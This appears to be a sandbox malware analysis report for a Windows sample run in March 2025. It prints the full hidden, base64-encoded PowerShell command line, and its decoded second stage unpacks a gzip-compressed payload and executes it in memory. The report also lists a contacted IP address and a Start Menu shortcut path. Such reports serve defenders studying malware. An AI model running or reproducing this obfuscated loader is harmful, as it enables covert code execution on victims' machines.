Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | March 3, 2025, 2:46 p.m. | March 3, 2025, 2:55 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8AUABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
2164-
powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlRiC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
2308
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
122.114.193.75 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBVADEAaQBtAGMAQwBBADcAVgBXAGIAVwArAGIAUwBCAEQAKwBYAHEAbgAvAEEAVgBWAEkAZwBPAHsAMQB9ADQAdgBVACcAJwArACcAJwBrAHsAMQB9AHEAZABLAEIAWAAzAEYATQBZAG8AZQBBAFkALwB1AHMAMAB3AFkAVwB2AFAASABDAHUAJwAnACsAJwAnAHIARABFAEwANwAzACsAOQB4AHMAdwB4AE8AawBsAHUAYwB1AGQAMQBKAFUAcwB3ACsAegBNADcATwB3AHoAegA4AHoAZwBKAGEASABEAEMAUQBzAEYAeAAvAHMAYwBDAGQAOAAvAGYAaABEAHkATgBVAEkAUgBDAGcAUgBaAGoARQBmAG0ARABwAFUARQBjAGQATgB7ADEAfQBqAHAAdABpADUASwArAEYAcgA0AEkAJwAnACsAJwAnADgAVgA5AGYAcgBOAGcAcwBRAEMAUgBjAFgARgA2ADAAawBpAG4ARABJAEQAKwAvAGwASAB1AFoAcQBIAE8AUABnAG4AaABJAGMAeQA0AHIAdwBwAHoAQgBaADQAZwBpAGYAWABOADgALwBZAEkAYwBMADMAdwBYAHgAagAzAEsAUABzAG4AdABFAGMANwBWAGQAQwB6AGwATABMAEoAeQBvAG8AWgB2AHUARABaAG0ARAAwAHMARAAnACcAKwAnACcASwA1AHAAbwBTAEwAawB1AC8ALwB5ADQAcAA4ADUAUABhAG8AdAB6ADUAbABpAEEAYQB5ADUASwA1AGkAegBrAE8AeQBpADYAbABrAGkATAA4AFUATgBJAEQAYgAzAGQAcgBMAEUAcwAnACcAKwAnACcARwBjAFMASQBXAE0ANAArAFgASgB5AFIAcwAxAE0AdABXACcAJwArACcAJwBHAEMAJwAnACsAJwAnAE0AUABYADQARwAzAFIAMgB4AGcAdgBtAFIAdQBMAE0ARgBkAGoAcgBlAEoATQBFACsAaQBNAEwAdABVADYAdQBXAGcASQAwAHYAdwBPAEkAcQBZAG8ANwBwAHUAaABPAE4AWQBLAGcAbgB6ADEAUAA5ADgAcwBmAGgATgBuAHUAZQBIADMAeQBRAGgASgB3AEUAdQA2AHkASABIAEUAVgB1AGIATwBIAG8AawBEAG8ANwBMAGYAUgBTADYARgBOADkAZwBiAHcARgBXAEoAbwA5AEkANgBDADgAVQBCAGQAUQBlADIAUQByAEwAWQBwAGgAUQBXAGgATAArAGkAeAB2ADUAQwBtADgASwA2AE4ANQByAEoARAA4ADMAQQBxADAAUgBqADUAUQBTAFoAUAB7ADEAfQBsAE4AUQAzAG0ASgBoAFEAZgBEAEsAVgBYADQAagB5AFEAUQBJAEYAMQBJAEEASwBnADkAeQBNAEYAMABDAHYASQB3AHgAdgBxAEsAOQB3ADUAQwBvAG8AMQB6ADMAWQB3AEIAQwB5AFAAVwBFAHcAeQAyADYAOQBDAHQAUwBRAFkAYwBEAGIAaQBMAE4AcgBCAHEAMwBnAGIASgBWAGgAWgBQAE0ARQB0AGkAUABTADAAOQBGADUAZgB0AGMASQBRAHoARABZAHgAQwBPAFkAMgBJACsANwBpAGEAUAA1AHsAMQB9ADUAawBXAGkATgA3AGEAcAAwAHQAcwA4AGIAbQBPACcAJwArACcAJwBQAGgATABpADkAQwAxAEYAQQBuAEkASwBxADgAbQB2ADUAdwBCADcARgBHAFIAegBsAFEAdQAwAEsANABwAE8AbABmAEEATwA3AGIAVQB5AHgAagAzAGcASwBjAFUAcQBMAEYAMgBhAGQAZwBQAEEAbgBXAHkAMABoADEATQBXAFIANgBrAEIATwBZADQAZwBLADAAcQAzADgASABNAHcAaABhADcASwBrAGgAdwBZAE8AQQBMAHIARABPAC8AQgBVADkASwBCAEEAYwBLAEcAZABGACcAJwArACcAJwA4AFcAdQBPAEQAMQA5AEIAeQBXAHAAUgBWAEUAYwBsADQAUgBSAEEAaABYAHEAbABBAFEAewAxAH0ASQA0AHIAZABrAHEAQwBHAE0AYwBtADMAMQBJAFMAegA3AEYARQA2AGgAbQBzAGsAbABCAE0ASAB4AGIAeAB3AHQAMQBEACsAQgBtAGQAKwBiAEkAdQBGAE0AWQA4AFMAQgA1AEkASwBFAE4AeQBhAGEAKwB3AFEAUgBGAE4ARQBTAGsASwBmAHUARgBqAGIAbQBjAFEAdgBqAHAAZAAnACcAKwAnACcAZQB4AGEATwBGAEsASQBYAEsAQQBVACsAUABrAEEAKwBRAHAARABpAFkAUABLAFYASwBCAEoARQBDAEwAWgBTAHkAaQBiAGsAZQByAEMAawBPAFEAQwBQAHIARgAxADIASwBmAE8AZwBPAGUAWABWAGsAegBFAEkAKwBkAHEAVQAzAHcAaQB5AHEANABFACcAJwArACcAJwBEADUARgBKAGMAQwBrAEcAZABCAFEAcgBKAE4AeQBuAGgASgBzAEUAbgBFAG8AZgB1AGsARwBHAC8AaQAvAHgASABCAHkANQA2AHsAMQB9AGgAZABLAEsAYwBKADQAWQB1AFMAaQB0AHUAYgBiAGoASwBmAG4ARgBBAEsAZgA4AHoATQBIAEoAbwBJAGcANAB3AE4AQwBOAFcASwBDAGgARwBKADgAMgBEACsAMQBGAC8AbABTADUASgBpADAAVgAxAGwAUQBQAHEAZQBGAG8ASwAxAEoAewAxAH0ATgA2AFMAbQBHAC8AQwB6AFMARQBOAG4ANwB7ADEAfQBQADMAYwAnACcAKwAnACcAdgBEAFEAcgAwAHsAMQB9AHQANwBkAEoAewAxAH0AOQBWAGcAMwArAHEAUAAyAHUATgA5AHYAUABnADUATQB1ADgAbgBOAGoAcwA0AHYAUgB6AG8AMwBPAG4AYwBQAEQANgBiAGEAdgA3AEcAbQBmAEsAYQByAC8AVgB0AFMAWABVADIAYgArAC8AVwBBADcATQAyAGgANgBrADYAMwBsAGQATwA5AHQAdAA5AFUAdABlADMAKwB3AFgAZQA5AGEAZAB2AHoALwBEAFAAUAB2AEsAbAA5ADcAcABMAGgAcABEAFgAVwBxAG4AVQAwAGIASABlAFMANAAnACcAKwAnACcAVQB7ADEAfQBiAGEATgBWAG0AMwBDAEcAYgAvAHAAaABZADQAOQBXAGcAeQArACsAbgBOAGsAVwBXAFYALwBIAHYAYQB1AGUASQBiAEkAZgBSAGcAMQAxAGoAeABsADUAWAAxAGQANgB5ADQAZQB3AEgAbgB0ADEAYgBHAHUANQB1ADIAcQArAGMAewAxAH0ANQBvAHIAdABhAE8AcQByAGIAQgBqAGQAegBWADIATwAnACcAKwAnACcAZABVAGkAZABWAFMAeAByAGEANAAyAHQAagByAGEAZQBBAHkAeQBVADcALwBpAE4AVQBGAEcANgAnACcAKwAnACcANgB5AEwAKwB1AHYAZAB4AHUASgBNADkAVgBVAHQAYQBZAFkAQgBXAG0AbwB7ADEAfQB1ADAANQBtADYANwB1AGIASgBmAGoAcQBRAGcAaABHAHAAZAByAFUAWABiAHgAbABYADQAWQB7ADEAfQBZAGoAOQBXAGIATgBTADcANABqAE8AMQBOAFcAagBXADMARAB0ADcAMwA2ACsAagA1AFcAQgBtAEoAOABQAHoAVwBlAHgAMgBCAHUAMgBOAHAAawA1AHIAbgBZAEgAVwA3AHEAbQBkAEcAOAB2AHEAegBpAGIAJwAnACsAJwAnADIAYQBqAGEANQBwAGIATwBKAFYAWgBzAHgANwBHAHcAcQBTAC8AQgBCAHMASABaAHQAcgArADQAcgBSAHMALwBYAGwAOQB1AGEARAAyAGUAZABaAGYANABEAEUAdABEADcAdQBsACcAJwArACcAJwBzADUAdAA3ADUAbwA0AGUAYgBTAEgAegAzADYANwBuAGgAeQBkAHIATwA5ADIAJwAnACsAJwAnAHQAMwBYAG0AVwBwAFYASwB2AFkAbgBTAFAAWABjAEkAaQBGAHYAMQBCAGMAaQBZAG0AawBmAC8AUABoAEIAMwBFAEEAUABmADUAYgB3AHQANQBxADgAZwBhAEoANABpAFMAZwBRAEEAZABwADMAVQBZAHAAZABGAG4AWAB6AGoAagB4AGkASgBMAFcAUQA1AFcAeQBzAHIAMwBBAFUAWQBnAHEAagBFAEkAWgBsAHcAVwBHAFYAVQB1AGEAawA4AHkARAB0ADMAewAxAH0AQwBLAEQAZwBNAGkAbgBWAGUAVwBuAHMAWAAwADIAcABNAGkAUABDAGsAcQB4AHoAbABSAGkAQwA0AHUAWgBoAEEAawBsAEEAVQBFAFAATQBTAGgAegA1AGUAbAA2AHIAWgBSAHIAVQBKAC8AcgAyADYAcgB6AFkAegAvADcANwA5AFkAaQA2ADEAJwAnACsAJwAnADMAcwBwAGcAVwBVAEQAVQB0AE4AOQBnADkAZQBLAGEAWgBaADMAQgBHAFAARQBHAFcAZgB6ADEAUQA4AEEAMwBBAG8AUwBHADkAQwBkAFYAYgBxAE0ASABSAEsAMgBnAGcAMABNADgATwBoAFoAMQBpAHAAegBGAEcAbgB5AE8AWABYACsAdQBKAEIAawBmAGcAQQBMAEUAYQAzAEgAdQBlAEQAbgA5AGcAQgAxAGkAZgA0AEcAKwBDAHkATgBQAFIAKwBIAHoAVQBpAGoASABWADEARgA5AEwAbQBMAHcANwBMAGUASABQAC8AUgBmAEMASABHAFgALwBzAFAAcwB1AEUAbABWAEwAQgAyAHgAZQBpAEgAOABXAFAATwB2AHEAdgB4AEMAQgBDAFMASQBjAE4ARQAzAG8AcwB4AFEAZgBwAHYANgByAFEATwBSAEYAOABpAHkALwBhAFgAYQBnAEMATAB4ADgAcABaAC8AQgAxAHcAawAvAHUAWQBJAFAAcQA2AHoAUgAvAHcAWABqADkAawBmAG8AZgB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBUACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA |
